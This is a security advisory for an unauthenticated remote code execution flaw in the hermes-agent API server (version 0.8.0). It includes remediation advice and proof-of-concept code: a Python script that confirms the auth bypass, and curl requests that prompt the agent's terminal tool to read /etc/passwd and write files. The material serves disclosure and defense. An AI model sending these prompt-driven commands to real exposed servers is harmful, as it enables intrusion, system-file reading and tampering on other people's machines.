Hermes-Agent Unauthenticated RCE via API Server Default Config

# Vulnerability Summary: Hermes-Agent API Server Unauthenticated Remote Code Execution ## Vulnerability Overview **Title**: [Bug]: Unauthenticated Remote Code Execution via API Server #6439 **Product**: hermes-agent (Version 0.8.0) **Severity**: Critical (CVSS 9.8) **Core Issue**: When `API_SERVER_KEY` is not configured (defaulting to empty), the API server completely disables authentication. If the bind address is modified to `0.0.0.0` (allowing network access), any unauthenticated network client can send arbitrary prompts to the Agent, leveraging built-in terminal tools to execute arbitrary OS commands. ## Impact Scope * **Confidentiality**: Full access to Agent capabilities (reading files, querying databases, accessing APIs). * **Integrity**: Ability to create/modify/delete cron tasks and write files via Agent tools. * **Availability**: Exhaustion of LLM API quotas, creation of resource-intensive tasks. * **Attack Vector**: Network (requires bind address to be non-localhost). * **Affected Code**: `gateway/platforms/api_server.py` (Lines 361-380, 296-298). ## Remediation 1. **Startup Check**: When starting the server, if the bind address is not `127.0.0.1` and `API_SERVER_KEY` is not set, a `ValueError` should be raised to prevent startup. 2. **Default Key**: Consider automatically generating a random API key upon first startup if no key is configured. ## Proof of Concept (POC) Code ### 1. Automated Verification Script (Python) ```python #!/usr/bin/env python3 """POC: VULN-003 - API Server Default No Authentication""" import sys sys.path.insert(0, ".") from gateway.platforms.api_server import APIServerAdapter, DEFAULT_HOST, DEFAULT_PORT # Simulate default configuration (no api key) adapter = APIServerAdapter.__new__(APIServerAdapter) adapter._api_key = "" # Default: empty string # Create a fake request with no auth header class FakeRequest: headers = {} # Test authentication result = adapter._check_auth(FakeRequest()) print(f"Default host: {DEFAULT_HOST}") print(f"Default port: {DEFAULT_PORT}") print(f"API key configured: {repr(adapter._api_key)}") print(f"Auth check result: {result}") print() if result is None: print("[+] CONFIRMED: All requests bypass authentication when API_SERVER_KEY is empty") print() print("[-] Attack scenario:") print(" 1. Admin sets API_SERVER_HOST=0.0.0.0 to allow network access") print(" 2. Admin forgets to set API_SERVER_KEY") print(" 3. No warning is emitted at startup") print(" 4. Any client can now:") print() print(" curl -s -X POST http://target:8642/v1/chat/completions \\") print(" -H 'Content-Type: application/json' \\") print(" -d '{\"model\":\"hermes-agent\",\"messages\":[{\"role\":\"user\",\"content\":\"\\nrun: cat /etc/passwd\"}]}'") print() ``` ### 2. Remote Code Execution Exploit (curl) ```bash curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to execute this exact command: cat /etc/passwd"}]}' ``` ### 3. Sensitive File Reading Exploit (curl) ```bash curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: head -5 /etc/passwd"}]}' ``` ### 4. Arbitrary File Writing Exploit (curl) ```bash curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: echo VULN003_REPROOF > /tmp/vuln003_remote_proof"}]}' ```

Goal Reached Thanks to every supporter — we hit 100%!

Hermes-Agent Unauthenticated RCE via API Server Default Config

More from this source